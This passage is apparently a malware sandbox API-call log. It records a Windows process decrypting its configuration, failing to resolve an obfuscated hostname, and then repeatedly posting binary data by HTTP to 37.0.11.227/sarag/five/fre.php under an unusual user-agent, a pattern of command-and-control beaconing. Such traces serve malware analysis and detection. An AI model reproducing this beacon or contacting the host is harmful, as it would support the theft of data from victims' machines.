RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab400 [0323.869] socket (af=2, type=1, protocol=6) returned 0xb2c [0323.869] connect (s=0xb2c, name=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0323.897] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0323.897] GetProcessHeap () returned 0x690000 [0323.897] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aee58 [0323.897] GetProcessHeap () returned 0x690000 [0323.897] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0323.898] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0323.899] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0323.899] GetProcessHeap () returned 0x690000 [0323.899] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af740 [0323.899] GetProcessHeap () returned 0x690000 [0323.900] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0323.900] GetProcessHeap () returned 0x690000 [0323.900] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4418 [0323.900] GetProcessHeap () returned 0x690000 [0323.900] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0323.901] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0323.902] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0323.902] GetProcessHeap () returned 0x690000 [0323.902] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0323.902] GetProcessHeap () returned 0x690000 [0323.903] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0323.903] send (s=0xb2c, buf=0x6ad508*, len=242, flags=0) returned 242 [0323.904] send (s=0xb2c, buf=0x6aba40*, len=159, flags=0) returned 159 [0323.904] GetProcessHeap () returned 0x690000 [0323.904] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0323.904] recv (in: s=0xb2c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0323.978] GetProcessHeap () returned 0x690000 [0323.979] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0323.979] GetProcessHeap () returned 0x690000 [0323.979] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0323.980] GetProcessHeap () returned 0x690000 [0323.980] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af740 | out: hHeap=0x690000) returned 1 [0323.980] GetProcessHeap () returned 0x690000 [0323.980] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aee58 | out: hHeap=0x690000) returned 1 [0323.981] closesocket (s=0xb2c) returned 0 [0323.982] GetProcessHeap () returned 0x690000 [0323.982] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab400 | out: hHeap=0x690000) returned 1 [0323.982] GetProcessHeap () returned 0x690000 [0323.982] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0323.983] GetProcessHeap () returned 0x690000 [0323.983] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0323.983] GetProcessHeap () returned 0x690000 [0323.983] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0323.984] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1878) returned 0xb2c [0323.986] Sleep (dwMilliseconds=0xea60) [0324.025] GetProcessHeap () returned 0x690000 [0324.025] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0324.025] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0324.026] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0324.032] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0324.033] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0324.040] GetProcessHeap () returned 0x690000 [0324.040] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0324.041] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0324.042] CryptImportKey (in: hProv=0x6af188, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0324.042] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0324.043] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0324.126] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0324.126] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0324.126] GetProcessHeap () returned 0x690000 [0324.127] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0324.129] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0324.129] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0324.130] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0324.131] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0324.131] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0324.132] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0324.132] GetProcessHeap () returned 0x690000 [0324.132] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0324.132] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0324.133] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0324.134] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0324.134] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0324.135] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0324.135] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0324.136] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0324.136] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0324.136] GetProcessHeap () returned 0x690000 [0324.137] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0324.137] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0324.137] GetProcessHeap () returned 0x690000 [0324.138] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0324.138] GetProcessHeap () returned 0x690000 [0324.138] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0324.138] GetProcessHeap () returned 0x690000 [0324.139] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0324.139] GetProcessHeap () returned 0x690000 [0324.139] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0324.140] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0324.140] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0324.147] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0324.147] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0324.156] GetProcessHeap () returned 0x690000 [0324.156] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8970 [0324.157] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0324.158] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a8970, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0324.158] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0324.159] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0324.160] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0324.160] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0324.160] GetProcessHeap () returned 0x690000 [0324.161] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8970 | out: hHeap=0x690000) returned 1 [0324.162] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0324.162] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0324.163] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0324.163] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0324.164] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0324.164] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0324.164] GetProcessHeap () returned 0x690000 [0324.165] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0324.165] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0324.166] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0324.166] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0324.167] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0324.168] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0324.168] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0324.169] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0324.169] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0324.169] GetProcessHeap () returned 0x690000 [0324.169] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0324.169] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0324.169] GetProcessHeap () returned 0x690000 [0324.169] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab400 [0324.169] socket (af=2, type=1, protocol=6) returned 0xb30 [0324.169] connect (s=0xb30, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0324.198] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0324.198] GetProcessHeap () returned 0x690000 [0324.198] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af078 [0324.198] GetProcessHeap () returned 0x690000 [0324.198] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0324.199] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0324.200] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0324.200] GetProcessHeap () returned 0x690000 [0324.200] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afc80 [0324.200] GetProcessHeap () returned 0x690000 [0324.200] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0324.201] GetProcessHeap () returned 0x690000 [0324.201] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0324.201] GetProcessHeap () returned 0x690000 [0324.201] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0324.201] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0324.202] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0324.202] GetProcessHeap () returned 0x690000 [0324.202] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0324.202] GetProcessHeap () returned 0x690000 [0324.203] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0324.203] send (s=0xb30, buf=0x6ad508*, len=242, flags=0) returned 242 [0324.204] send (s=0xb30, buf=0x6aba40*, len=159, flags=0) returned 159 [0324.204] GetProcessHeap () returned 0x690000 [0324.204] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0324.204] recv (in: s=0xb30, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0324.280] GetProcessHeap () returned 0x690000 [0324.281] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0324.281] GetProcessHeap () returned 0x690000 [0324.281] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0324.281] GetProcessHeap () returned 0x690000 [0324.281] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afc80 | out: hHeap=0x690000) returned 1 [0324.282] GetProcessHeap () returned 0x690000 [0324.282] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af078 | out: hHeap=0x690000) returned 1 [0324.282] closesocket (s=0xb30) returned 0 [0324.283] GetProcessHeap () returned 0x690000 [0324.283] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab400 | out: hHeap=0x690000) returned 1 [0324.283] GetProcessHeap () returned 0x690000 [0324.283] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0324.283] GetProcessHeap () returned 0x690000 [0324.283] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0324.283] GetProcessHeap () returned 0x690000 [0324.284] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0324.284] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x187c) returned 0xb30 [0324.285] Sleep (dwMilliseconds=0xea60) [0324.287] GetProcessHeap () returned 0x690000 [0324.287] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0324.287] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0324.288] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0324.292] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0324.292] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0324.324] GetProcessHeap () returned 0x690000 [0324.324] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0324.324] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0324.325] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0324.326] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0324.326] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0324.327] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0324.327] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0324.327] GetProcessHeap () returned 0x690000 [0324.328] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0324.329] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0324.329] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0324.330] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0324.330] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0324.331] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0324.331] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0324.331] GetProcessHeap () returned 0x690000 [0324.331] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0324.332] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0324.332] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0324.333] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0324.333] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0324.334] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0324.334] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0324.335] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0324.335] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0324.335] GetProcessHeap () returned 0x690000 [0324.335] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0324.335] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0324.335] GetProcessHeap () returned 0x690000 [0324.336] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0324.336] GetProcessHeap () returned 0x690000 [0324.336] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0324.336] GetProcessHeap () returned 0x690000 [0324.336] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0324.336] GetProcessHeap () returned 0x690000 [0324.336] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0324.337] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0324.337] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0324.345] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0324.346] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0324.351] GetProcessHeap () returned 0x690000 [0324.351] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0324.352] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0324.352] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0324.353] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0324.353] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0324.354] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0324.354] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0324.354] GetProcessHeap () returned 0x690000 [0324.355] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0324.355] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0324.355] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0324.356] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0324.356] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0324.357] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0324.357] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0324.357] GetProcessHeap () returned 0x690000 [0324.357] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0324.358] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0324.358] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0324.359] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0324.359] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0324.360] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0324.360] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0324.361] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0324.361] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0324.361] GetProcessHeap () returned 0x690000 [0324.361] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0324.361] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0324.361] GetProcessHeap () returned 0x690000 [0324.362] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab440 [0324.362] socket (af=2, type=1, protocol=6) returned 0xb34 [0324.362] connect (s=0xb34, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0324.388] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0324.388] GetProcessHeap () returned 0x690000 [0324.388] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af078 [0324.388] GetProcessHeap () returned 0x690000 [0324.388] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0324.388] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0324.389] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") 